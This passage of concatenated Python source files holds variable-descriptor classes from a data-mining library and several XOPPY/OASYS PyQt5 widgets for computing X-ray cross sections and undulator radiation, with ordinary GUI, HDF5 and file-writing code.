"{}('{}', {})".format(self.__class__.__name__, self.name, args) @staticmethod def is_primitive(): """ Return `True`: discrete variables are stored as floats. """ return True def to_val(self, s): """ Convert the given argument to a value of the variable (`float`). If the argument is numeric, its value is returned without checking whether it is integer and within bounds. `Unknown` is returned if the argument is one of the representations for unknown values. Otherwise, the argument must be a string and the method returns its index in :obj:`values`. :param s: values, represented as a number, string or `None` :rtype: float """ if s is None: return ValueUnknown if isinstance(s, int): return s if isinstance(s, Real): return s if isnan(s) else floor(s + 0.25) if s in self.unknown_str: return ValueUnknown if not isinstance(s, str): raise TypeError('Cannot convert {} to value of "{}"'.format( type(s).__name__, self.name)) return self.values.index(s) def add_value(self, s): """ Add a value `s` to the list of values. """ self.values.append(s) def val_from_str_add(self, s): """ Similar to :obj:`to_val`, except that it accepts only strings and that it adds the value to the list if it does not exist yet. :param s: symbolic representation of the value :type s: str :rtype: float """ try: return ValueUnknown if s in self.unknown_str \ else self.values.index(s) except ValueError: self.add_value(s) return len(self.values) - 1 def repr_val(self, val): """ Return a textual representation of the value (`self.values[int(val)]`) or "?" if the value is unknown. :param val: value :type val: float (should be whole number) :rtype: str """ if isnan(val): return "?" return '{}'.format(self.values[int(val)]) str_val = repr_val @staticmethod def make(name, values=(), ordered=False, base_value=-1): """ Return a variable with the given name and other properties. The method first looks for a compatible existing variable: the existing variable must have the same name and both variables must have either ordered or unordered values. If values are ordered, the order must be compatible: all common values must have the same order. If values are unordered, the existing variable must have at least one common value with the new one, except when any of the two lists of values is empty. If a compatible variable is find, it is returned, with missing values appended to the end of the list. If there is no explicit order, the values are ordered using :obj:`ordered_values`. Otherwise, it constructs and returns a new variable descriptor. :param name: the name of the variable :type name: str :param values: symbolic values for the variable :type values: list :param ordered: tells whether the order of values is fixed :type ordered: bool :param base_value: the index of the base value, or -1 if there is none :type base_value: int :returns: an existing compatible variable or `None` """ var = DiscreteVariable._find_compatible( name, values, ordered, base_value) if var: return var if not ordered: base_value_rep = base_value != -1 and values[base_value] values = DiscreteVariable.ordered_values(values) if base_value != -1: base_value = values.index(base_value_rep) return DiscreteVariable(name, values, ordered, base_value) @staticmethod def _find_compatible(name, values=(), ordered=False, base_value=-1): """ Return a compatible existing value, or `None` if there is None. See :obj:`make` for details; this function differs by returning `None` instead of constructing a new descriptor. (Method :obj:`make` calls this function.) :param name: the name of the variable :type name: str :param values: symbolic values for the variable :type values: list :param ordered: tells whether the order of values is fixed :type ordered: bool :param base_value: the index of the base value, or -1 if there is none :type base_value: int :returns: an existing compatible variable or `None` """ base_rep = base_value != -1 and values[base_value] existing = DiscreteVariable.all_discrete_vars.get(name) if existing is None: return None if not ordered: values = DiscreteVariable.ordered_values(values) for var in existing: if (var.ordered != ordered or var.base_value != -1 and var.values[var.base_value] != base_rep): continue if not values: break # we have the variable - any existing values are OK if ordered: i = 0 for val in var.values: if values[i] == val: i += 1 if i == len(values): break # we have all the values else: # we have some remaining values: check them, add them if set(values[i:]) & set(var.values): continue # next var in existing for val in values[i:]: var.add_value(val) break # we have the variable else: # not ordered if var.values and not set(var.values) & set(values): continue # empty intersection of values; not compatible vv = set(var.values) for val in values: if val not in vv: var.add_value(val) break # we have the variable else: return None if base_value != -1 and var.base_value == -1: var.base_value = var.values.index(base_rep) return var @classmethod def _clear_cache(cls): """ Clears the list of variables for reuse by :obj:`make`. """ cls.all_discrete_vars.clear() @staticmethod def ordered_values(values): """ Return a sorted list of values. If there exists a prescribed order for such set of values, it is returned. Otherwise, values are sorted alphabetically. """ for presorted in DiscreteVariable.presorted_values: if values == set(presorted): return presorted return sorted(values) class StringVariable(Variable): """ Descriptor for string variables. String variables can only appear as meta attributes. """ all_string_vars = {} Unknown = None def __init__(self, name="", default_col=-1): """Construct a new descriptor.""" super().__init__(name) StringVariable.all_string_vars[name] = self @staticmethod def is_primitive(): """Return `False`: string variables are not stored as floats.""" return False @staticmethod def compute_value(_): return None def to_val(self, s): """ Return the value as a string. If it is already a string, the same object is returned. """ if s is None: return "" if isinstance(s, str): return s return str(s) val_from_str_add = to_val def str_val(self, val): """Return a string representation of the value.""" if isinstance(val, Value): if val.value is None: return "None" val = val.value return str(val) def repr_val(self, val): """Return a string representation of the value.""" return '"{}"'.format(self.str_val(val)) @staticmethod def make(name): """ Return an existing string variable with the given name, or construct and return a new one. """ existing_var = StringVariable.all_string_vars.get(name) return existing_var or StringVariable(name) @classmethod def _clear_cache(cls): """ Clears the list of variables for reuse by :obj:`make`. """ cls.all_string_vars.clear() Variable._variable_types += [DiscreteVariable, ContinuousVariable, StringVariable ] ``` #### File: xoppy/util/text_window.py ```python from PyQt5.QtWidgets import QWidget, QVBoxLayout, QMainWindow, QDialog from PyQt5.QtWidgets import QPlainTextEdit, QTextEdit class TextWindow(QMainWindow): def __init__(self, parent=None, title="", file=""): QMainWindow.__init__(self, parent) left = 10 top = 10 width = 700 height = 850 self.setWindowTitle(title) self.setGeometry(left, top, width, height) self.text_edit = QPlainTextEdit(self) self.text_edit.setReadOnly(True) self.text_edit.setFixedHeight(height-top) self.text_edit.setFixedWidth(width-left) if file != "": self.set_file(file) self.show() def clear(self): self.text_edit.setPlainText("") def set_text(self,text): self.clear() self.text_edit.setPlainText(text) def set_file(self,filename): text = open(filename).read() print("Displaying file: "+filename) self.setWindowTitle(filename) self.set_text(text) if __name__ == "__main__": from PyQt5.QtWidgets import QApplication app = QApplication([]) oo = TextWindow(file="/home/manuel/OASYS1.2/xoppy/orangecontrib/xoppy/util/doc_txt/us.txt") app.exec_() ``` #### File: widgets/optics/xcrosssec.py ```python import sys import numpy from PyQt5.QtWidgets import QApplication, QMessageBox from orangewidget import gui from orangewidget.settings import Setting from oasys.widgets import gui as oasysgui, congruence from oasys.widgets.exchange import DataExchangeObject from orangecontrib.xoppy.util.xoppy_xraylib_util import cross_calc, cross_calc_mix, cross_calc_nist from orangecontrib.xoppy.util.xoppy_xraylib_util import nist_compound_list, density_element, density_nist from orangecontrib.xoppy.widgets.gui.ow_xoppy_widget import XoppyWidget # import xraylib class OWxcrosssec(XoppyWidget): name = "CrossSec" id = "orange.widgets.dataxcrosssec" description = "X-ray Matter Cross Sections" icon = "icons/xoppy_xcrosssec.png" priority = 19 category = "" keywords = ["xoppy", "xcrosssec"] MAT_FLAG = Setting(2) DESCRIPTOR = Setting("Si") MAT_LIST = Setting(177) DENSITY = Setting("?") CALCULATE = Setting(1) GRID = Setting(0) GRIDSTART = Setting(100.0) GRIDEND = Setting(10000.0) GRIDN = Setting(200) UNIT = Setting(0) DUMP_TO_FILE = Setting(0) # No FILE_NAME = Setting("CrossSec.dat") xtitle = None ytitle = None def build_gui(self): box = oasysgui.widgetBox(self.controlArea, self.name + " Input Parameters", orientation="vertical", width=self.CONTROL_AREA_WIDTH-5) idx = -1 #widget index 1 idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "MAT_FLAG", label=self.unitLabels()[idx], addSpace=False, items=['Element(formula)', 'Compound(formula)', 'Compound(table)'], valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 2 idx += 1 box1 = gui.widgetBox(box) items = nist_compound_list() gui.comboBox(box1, self, "MAT_LIST", label=self.unitLabels()[idx], addSpace=False, items=items, valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 3 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "DESCRIPTOR", label=self.unitLabels()[idx], addSpace=False, orientation="horizontal") self.show_at(self.unitFlags()[idx], box1) #widget index 4 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "DENSITY", label=self.unitLabels()[idx], addSpace=False, valueType=str, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 5 idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "CALCULATE", label=self.unitLabels()[idx], addSpace=False, items=['Total','PhotoElectric','Rayleigh','Compton','Total-Rayleigh'], valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 6 idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "GRID", label=self.unitLabels()[idx], addSpace=False, items=['Standard', 'User defined', 'Single Value'], valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 7 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "GRIDSTART", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 8 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "GRIDEND", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 9 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "GRIDN", label=self.unitLabels()[idx], addSpace=False, valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 10 idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "UNIT", label=self.unitLabels()[idx], addSpace=False, items=['barn/atom [Cross Section] *see help*', 'cm^2 [Cross Section] *see help*', 'cm^2/g [Mass abs coef]', 'cm^-1 [Linear abs coef]'], valueType=int, orientation="horizontal", labelWidth=130) self.show_at(self.unitFlags()[idx], box1) # widget index 11 idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "DUMP_TO_FILE", label=self.unitLabels()[idx], addSpace=True, items=["No", "Yes"], orientation="horizontal") self.show_at(self.unitFlags()[idx], box1) # widget index 12 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "FILE_NAME", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) gui.rubber(self.controlArea) def unitLabels(self): return ['material','table','formula','density', 'Cross section','Energy [eV] grid:', 'Starting Energy [eV]: ','To: ','Number of points','Units', 'Dump to file','File name'] def unitFlags(self): return ['True','self.MAT_FLAG == 2','self.MAT_FLAG <= 1 ','True', 'True','True', 'self.GRID != 0','self.GRID == 1','self.GRID == 1','True', 'True','self.DUMP_TO_FILE == 1'] def get_help_name(self): return 'crosssec' def check_fields(self): self.DESCRIPTOR = congruence.checkEmptyString(self.DESCRIPTOR, "formula") if self.GRID > 0: self.GRIDSTART = congruence.checkPositiveNumber(self.GRIDSTART, "Starting Energy") if self.GRID == 1: self.GRIDEND = congruence.checkStrictlyPositiveNumber(self.GRIDEND, "Energy to") congruence.checkLessThan(self.GRIDSTART, self.GRIDEND, "Starting Energy", "Energy to") self.GRIDN = congruence.checkStrictlyPositiveNumber(self.GRIDN, "Number of points") def do_xoppy_calculation(self): out_dict = self.xoppy_calc_xcrosssec() if "info" in out_dict.keys(): print(out_dict["info"]) #send exchange calculated_data = DataExchangeObject("XOPPY", self.get_data_exchange_widget_name()) try: calculated_data.add_content("xoppy_data", out_dict["data"].T) calculated_data.add_content("plot_x_col",0) calculated_data.add_content("plot_y_col",-1) except: pass try: calculated_data.add_content("labels", out_dict["labels"]) except: pass try: calculated_data.add_content("info",out_dict["info"]) except: pass return calculated_data def extract_data_from_xoppy_output(self, calculation_output): try: calculation_output.get_content("xoppy_data") labels = calculation_output.get_content("labels") self.xtitle = labels[0] self.ytitle = labels[1] except: QMessageBox.information(self, "Calculation Result", "Calculation Result:\n"+calculation_output.get_content("info"), QMessageBox.Ok) self.xtitle = None self.ytitle = None return calculation_output def plot_results(self, calculated_data, progressBarValue=80): self.initializeTabs() try: calculated_data.get_content("xoppy_data") super().plot_results(calculated_data, progressBarValue) except: self.plot_info(calculated_data.get_content("info") + "\n", progressBarValue, 0, 0) def get_data_exchange_widget_name(self): return "XCROSSSEC" def getTitles(self): return ["Calculation Result"] def getXTitles(self): if self.xtitle is None: return [""] else: return [self.xtitle] def getYTitles(self): if self.ytitle is None: return [""] else: return [self.ytitle] def getLogPlot(self): return [(True, True)] def getVariablesToPlot(self): return [(0, 1)] def getLogPlot(self): return[(True, True)] def xoppy_calc_xcrosssec(self): MAT_FLAG = self.MAT_FLAG MAT_LIST = self.MAT_LIST # DESCRIPTOR = self.DESCRIPTOR # density = self.DENSITY CALCULATE = self.CALCULATE GRID = self.GRID GRIDSTART = self.GRIDSTART GRIDEND = self.GRIDEND GRIDN = self.GRIDN UNIT = self.UNIT if MAT_FLAG == 0: # element descriptor = self.DESCRIPTOR # density = element_density(DESCRIPTOR) try: density = float(self.DENSITY) except: density = density_element(self.DESCRIPTOR, verbose=True) elif MAT_FLAG == 1: # compund descriptor = self.DESCRIPTOR try: density = float(self.DENSITY) except: raise Exception("Density must be entered.") elif MAT_FLAG == 2: # nist list descriptor = nist_compound_list()[self.MAT_LIST] try: density = float(self.DENSITY) except: density = density_nist(descriptor, verbose=True) print("xoppy_calc_xcrosssec: using density = %g g/cm3"%density) if GRID == 0: energy = numpy.arange(0,500) elefactor = numpy.log10(10000.0 / 30.0) / 300.0 energy = 10.0 * 10**(energy * elefactor) elif GRID == 1: if GRIDN == 1: energy = numpy.array([GRIDSTART]) else: energy = numpy.linspace(GRIDSTART,GRIDEND,GRIDN) elif GRID == 2: energy = numpy.array([GRIDSTART]) if MAT_FLAG == 0: # element out = cross_calc(descriptor,energy,calculate=CALCULATE,density=density) elif MAT_FLAG == 1: # compound parse out = cross_calc_mix(descriptor,energy,calculate=CALCULATE,density=density) elif MAT_FLAG == 2: # NIST compound out = cross_calc_nist(descriptor,energy,calculate=CALCULATE,density=density) calculate_items = ['Total','PhotoElectric','Rayleigh','Compton','Total minus Rayleigh'] unit_items = ['barn/atom','cm^2','cm^2/g','cm^-1'] if energy.size > 1: tmp_x = out[0,:].copy() tmp_y = out[UNIT+1,:].copy() tmp = numpy.vstack((tmp_x,tmp_y)) labels = ["Photon energy [eV]","%s cross section [%s]"%(calculate_items[CALCULATE],unit_items[UNIT])] to_return = {"application":"xoppy","name":"xcrosssec","data":tmp,"labels":labels} else: tmp = None txt = "xoppy_calc_xcrosssec: Calculated %s cross section: %g %s"%(calculate_items[CALCULATE],out[UNIT+1,0],unit_items[UNIT]) print(txt) to_return = {"application":"xoppy","name":"xcrosssec","info":txt} if self.DUMP_TO_FILE: with open(self.FILE_NAME, "w") as file: try: file.write("#F %s\n"%self.FILE_NAME) file.write("\n#S 1 xoppy CrossSec results\n") file.write("#N 5\n") tmp = "#L Photon energy [eV]" for unit_item in unit_items: tmp += " %s [%s]"%(calculate_items[CALCULATE],unit_item) tmp += "\n" file.write(tmp) for j in range(out.shape[1]): # file.write("%19.12e "%energy[j]) file.write(("%19.12e "*out.shape[0]+"\n")%tuple(out[i,j] for i in range(out.shape[0]))) file.close() print("File written to disk: %s \n"%self.FILE_NAME) except: raise Exception("CrossSec: The data could not be dumped onto the specified file!\n") return to_return if __name__ == "__main__": app = QApplication(sys.argv) w = OWxcrosssec() w.show() app.exec() w.saveSettings() ``` #### File: widgets/source/undulator_radiation.py ```python import sys from PyQt5.QtWidgets import QApplication from orangewidget import gui from orangewidget.settings import Setting from oasys.widgets import gui as oasysgui, congruence from oasys.widgets.exchange import DataExchangeObject from orangecontrib.xoppy.widgets.gui.ow_xoppy_widget import XoppyWidget from orangecontrib.xoppy.util.xoppy_undulators import xoppy_calc_undulator_radiation from syned.widget.widget_decorator import WidgetDecorator import syned.beamline.beamline as synedb import syned.storage_ring.magnetic_structures.insertion_device as synedid try: from silx.gui.dialog.DataFileDialog import DataFileDialog except: print("Fail to import silx.gui.dialog.DataFileDialog: need silx >= 0.7") import scipy.constants as codata import os import h5py from oasys.widgets.gui import ConfirmDialog class OWundulator_radiation(XoppyWidget, WidgetDecorator): name = "Undulator Radiation" id = "orange.widgets.dataundulator_radiation" description = "Undulator Radiation" icon = "icons/xoppy_undulator_radiation.png" priority = 5 category = "" keywords = ["xoppy", "undulator_radiation"] # overwrite from outputs = [{"name": "xoppy_data", "type": DataExchangeObject, "doc": ""}] USEEMITTANCES=Setting(1) ELECTRONENERGY = Setting(6.04) ELECTRONENERGYSPREAD = Setting(0.001) ELECTRONCURRENT = Setting(0.2) ELECTRONBEAMSIZEH = Setting(0.000395) ELECTRONBEAMSIZEV = Setting(9.9e-06) ELECTRONBEAMDIVERGENCEH = Setting(1.05e-05) ELECTRONBEAMDIVERGENCEV = Setting(3.9e-06) PERIODID = Setting(0.018) NPERIODS = Setting(222) KV = Setting(1.68) KH = Setting(0.0) KPHASE = Setting(0.0) DISTANCE = Setting(30.0) SETRESONANCE = Setting(0) HARMONICNUMBER = Setting(1) GAPH = Setting(0.003) GAPV = Setting(0.003) HSLITPOINTS = Setting(41) VSLITPOINTS = Setting(41) PHOTONENERGYMIN = Setting(6000.0) PHOTONENERGYMAX = Setting(8500.0) PHOTONENERGYPOINTS = Setting(20) METHOD = Setting(2) H5_FILE_DUMP = Setting(0) inputs = WidgetDecorator.syned_input_data() filename = "" def __init__(self): super().__init__(show_script_tab=True) def build_gui(self): tabs_setting = oasysgui.tabWidget(self.controlArea) tabs_setting.setFixedWidth(self.CONTROL_AREA_WIDTH-5) tab_1 = oasysgui.createTabPage(tabs_setting, self.name + " Input Parameters") tab_2 = oasysgui.createTabPage(tabs_setting, "Calculation Setting") box = oasysgui.widgetBox(tab_1, "", orientation="vertical", width=self.CONTROL_AREA_WIDTH-15) idx = -1 # # # idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "USEEMITTANCES", label=self.unitLabels()[idx], addSpace=False, items=['No', 'Yes'], valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 0 idx += 1 box1 = gui.widgetBox(box) self.id_ELECTRONENERGY = oasysgui.lineEdit(box1, self, "ELECTRONENERGY", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 1 idx += 1 box1 = gui.widgetBox(box) self.id_ELECTRONENERGYSPREAD = oasysgui.lineEdit(box1, self, "ELECTRONENERGYSPREAD", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 2 idx += 1 box1 = gui.widgetBox(box) self.id_ELECTRONCURRENT = oasysgui.lineEdit(box1, self, "ELECTRONCURRENT", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 3 idx += 1 box1 = gui.widgetBox(box) self.id_ELECTRONBEAMSIZEH = oasysgui.lineEdit(box1, self, "ELECTRONBEAMSIZEH", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 4 idx += 1 box1 = gui.widgetBox(box) self.id_ELECTRONBEAMSIZEV = oasysgui.lineEdit(box1, self, "ELECTRONBEAMSIZEV", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 5 idx += 1 box1 = gui.widgetBox(box) self.id_ELECTRONBEAMDIVERGENCEH = oasysgui.lineEdit(box1, self, "ELECTRONBEAMDIVERGENCEH", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 6 idx += 1 box1 = gui.widgetBox(box) self.id_ELECTRONBEAMDIVERGENCEV = oasysgui.lineEdit(box1, self, "ELECTRONBEAMDIVERGENCEV", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 7 idx += 1 box1 = gui.widgetBox(box) self.id_PERIODID = oasysgui.lineEdit(box1, self, "PERIODID", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 8 idx += 1 box1 = gui.widgetBox(box) self.id_NPERIODS = oasysgui.lineEdit(box1, self, "NPERIODS", label=self.unitLabels()[idx], addSpace=False, valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 9 idx += 1 box1 = gui.widgetBox(box) self.id_KV = oasysgui.lineEdit(box1, self, "KV", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 9B idx += 1 box1 = gui.widgetBox(box) self.id_KH = oasysgui.lineEdit(box1, self, "KH", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 9C idx += 1 box1 = gui.widgetBox(box) self.id_KPHASE = oasysgui.lineEdit(box1, self, "KPHASE", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) box = oasysgui.widgetBox(tab_2, "", orientation="vertical", width=self.CONTROL_AREA_WIDTH-15) #widget index 10 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "DISTANCE", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) # widget <><><> idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "SETRESONANCE", label=self.unitLabels()[idx], addSpace=False, items=['User defined', 'Set to resonance/central cone','Set to resonance/up to first ring'], valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget <><><> idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "HARMONICNUMBER", label=self.unitLabels()[idx], addSpace=False, valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 11 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "GAPH", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 12 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "GAPV", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 13 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "HSLITPOINTS", label=self.unitLabels()[idx], addSpace=False, valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 14 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "VSLITPOINTS", label=self.unitLabels()[idx], addSpace=False, valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index <><> idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "PHOTONENERGYMIN", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index <><> idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "PHOTONENERGYMAX", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index <><> idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "PHOTONENERGYPOINTS", label=self.unitLabels()[idx], addSpace=False, valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 15 idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "METHOD", label=self.unitLabels()[idx], addSpace=False, items=['US', 'URGENT', 'SRW','pySRU'], valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 16 idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "H5_FILE_DUMP", label=self.unitLabels()[idx], addSpace=False, items=['None', 'Write h5 file: undulator_radiation.h5','Read from file...'], valueType=int, orientation="horizontal", labelWidth=250, callback=self.read_or_write_file) self.show_at(self.unitFlags()[idx], box1) def read_or_write_file(self): value = self.H5_FILE_DUMP if value == 0: return elif value == 1: # write return elif value == 2: # read self.H5_FILE_DUMP = 0 use_silx_file_dialog = False # silx dialog is freezing the linux system, change to traditional if use_silx_file_dialog: tmp = ConfirmDialog.confirmed(self, message="Please select in a hdf5 file a data block\n(such as XOPPY_RADIATION)\nthat contains a 'Radiation' entry", title="Confirm Action") if tmp == False: return dialog = DataFileDialog(self) dialog.setFilterMode(DataFileDialog.FilterMode.ExistingGroup) result = dialog.exec_() if not result: return print(dialog.selectedFile()) print(dialog.selectedUrl()) print(dialog.selectedDataUrl().data_path()) calculation_output = self.extract_data_from_h5file(dialog.selectedFile(), dialog.selectedDataUrl().data_path() ) self.filename = dialog.selectedFile() else: tmp = ConfirmDialog.confirmed(self, message="Please select a hdf5 file containing a data block\n named XOPPY_RADIATION which includes 'Radiation' entry", title="Confirm Action") if tmp == False: return self.filename = oasysgui.selectFileFromDialog(self, previous_file_path=self.filename, message="Open hdf5 File", start_directory="", file_extension_filter="*.*5") if self.filename == "": return try: calculation_output = self.extract_data_from_h5file(self.filename, "/XOPPY_RADIATION" ) except: calculation_output = None if calculation_output is None: raise Exception("Bad data from file.") else: self.calculated_data = self.extract_data_from_xoppy_output(calculation_output) try: self.set_fields_from_h5file(self.filename, "/XOPPY_RADIATION") except: pass # self.add_specific_content_to_calculated_data(self.calculated_data) # self.setStatusMessage("Plotting Results") self.plot_results(self.calculated_data, progressBarValue=60) self.setStatusMessage("") self.send("xoppy_data", self.calculated_data) self.set_enabled(True) def extract_data_from_h5file(self,file_h5,subtitle): hf = h5py.File(file_h5,'r') try: p = hf[subtitle+"/Radiation/stack_data"].value e = hf[subtitle+"/Radiation/axis0"].value h = hf[subtitle+"/Radiation/axis1"].value v = hf[subtitle+"/Radiation/axis2"].value except: raise Exception("Data not plottable: bad content\n" + str(e)) code = "unknown" try: if hf[subtitle+"/parameters/METHOD"].value == 0: code = 'US' elif hf[subtitle+"/parameters/METHOD"].value == 1: code = 'URGENT' elif hf[subtitle+"/parameters/METHOD"].value == 2: code = 'SRW' elif hf[subtitle+"/parameters/METHOD"].value == 3: code = 'pySRU' except: pass hf.close() return e, h, v, p, code def set_fields_from_h5file(self,file_h5,subtitle): hf = h5py.File(file_h5,'r') self.METHOD = hf[subtitle + "/parameters/METHOD"].value self.USEEMITTANCES = hf[subtitle + "/parameters/USEEMITTANCES"].value self.ELECTRONENERGY = hf[subtitle + "/parameters/ELECTRONENERGY"].value self.ELECTRONENERGYSPREAD = hf[subtitle + "/parameters/ELECTRONENERGYSPREAD"].value self.ELECTRONCURRENT = hf[subtitle + "/parameters/ELECTRONCURRENT"].value self.ELECTRONBEAMSIZEH = hf[subtitle + "/parameters/ELECTRONBEAMSIZEH"].value self.ELECTRONBEAMSIZEV = hf[subtitle + "/parameters/ELECTRONBEAMSIZEV"].value self.ELECTRONBEAMDIVERGENCEH = hf[subtitle + "/parameters/ELECTRONBEAMDIVERGENCEH"].value self.ELECTRONBEAMDIVERGENCEV = hf[subtitle + "/parameters/ELECTRONBEAMDIVERGENCEV"].value self.PERIODID = hf[subtitle + "/parameters/PERIODID"].value self.NPERIODS = hf[subtitle + "/parameters/NPERIODS"].value self.KV = hf[subtitle + "/parameters/KV"].value self.KH = hf[subtitle + "/parameters/KH"].value self.KPHASE = hf[subtitle + "/parameters/KPHASE"].value self.DISTANCE = hf[subtitle + "/parameters/DISTANCE"].value self.SETRESONANCE = hf[subtitle + "/parameters/SETRESONANCE"].value self.HARMONICNUMBER = hf[subtitle + "/parameters/HARMONICNUMBER"].value self.GAPH = hf[subtitle + "/parameters/GAPH"].value self.GAPV = hf[subtitle + "/parameters/GAPV"].value self.HSLITPOINTS = hf[subtitle + "/parameters/HSLITPOINTS"].value self.VSLITPOINTS = hf[subtitle + "/parameters/VSLITPOINTS"].value self.PHOTONENERGYMIN = hf[subtitle + "/parameters/PHOTONENERGYMIN"].value self.PHOTONENERGYMAX = hf[subtitle + "/parameters/PHOTONENERGYMAX"].value self.PHOTONENERGYPOINTS = hf[subtitle + "/parameters/PHOTONENERGYPOINTS"].value hf.close() def unitLabels(self): return ["Use emittances","Electron Energy [GeV]", "Electron Energy Spread", "Electron Current [A]", "Electron Beam Size H [m]", "Electron Beam Size V [m]","Electron Beam Divergence H [rad]", "Electron Beam Divergence V [rad]", "Period ID [m]", "Number of periods","Kv [K value vertical field]", "Kh [K value horizontal field]","Kphase [phase diff Kh - Kv in rad]", "Distance to slit [m]", "Set photon energy and slit","Harmonic number", "Slit gap H [m]", "Slit gap V [m]", "Number of slit mesh points in H", "Number of slit mesh points in V", "Photon Energy Min [eV]","Photon Energy Max [eV]","Number of Photon Energy Points", "calculation code","hdf5 file"] # TODO check energy spread flag: set to False (not used at all)!! def unitFlags(self): return ["True", "True", "False", "True", "self.USEEMITTANCES == 1", "self.USEEMITTANCES == 1","self.USEEMITTANCES == 1", "self.USEEMITTANCES == 1", "True", "True", "True", "self.METHOD != 3","self.METHOD != 3", "True", "True", "self.SETRESONANCE > 0", "self.SETRESONANCE == 0", "self.SETRESONANCE == 0", "True", "True", "self.SETRESONANCE == 0", "self.SETRESONANCE == 0","self.SETRESONANCE == 0", "True","True"] def get_help_name(self): return 'undulator_radiation' def check_fields(self): self.ELECTRONENERGY = congruence.checkStrictlyPositiveNumber(self.ELECTRONENERGY, "Electron Energy") if not self.METHOD == 1: self.ELECTRONENERGYSPREAD = congruence.checkPositiveNumber(self.ELECTRONENERGYSPREAD, "Electron Energy Spread") self.ELECTRONCURRENT = congruence.checkStrictlyPositiveNumber(self.ELECTRONCURRENT, "Electron Current") self.ELECTRONBEAMSIZEH = 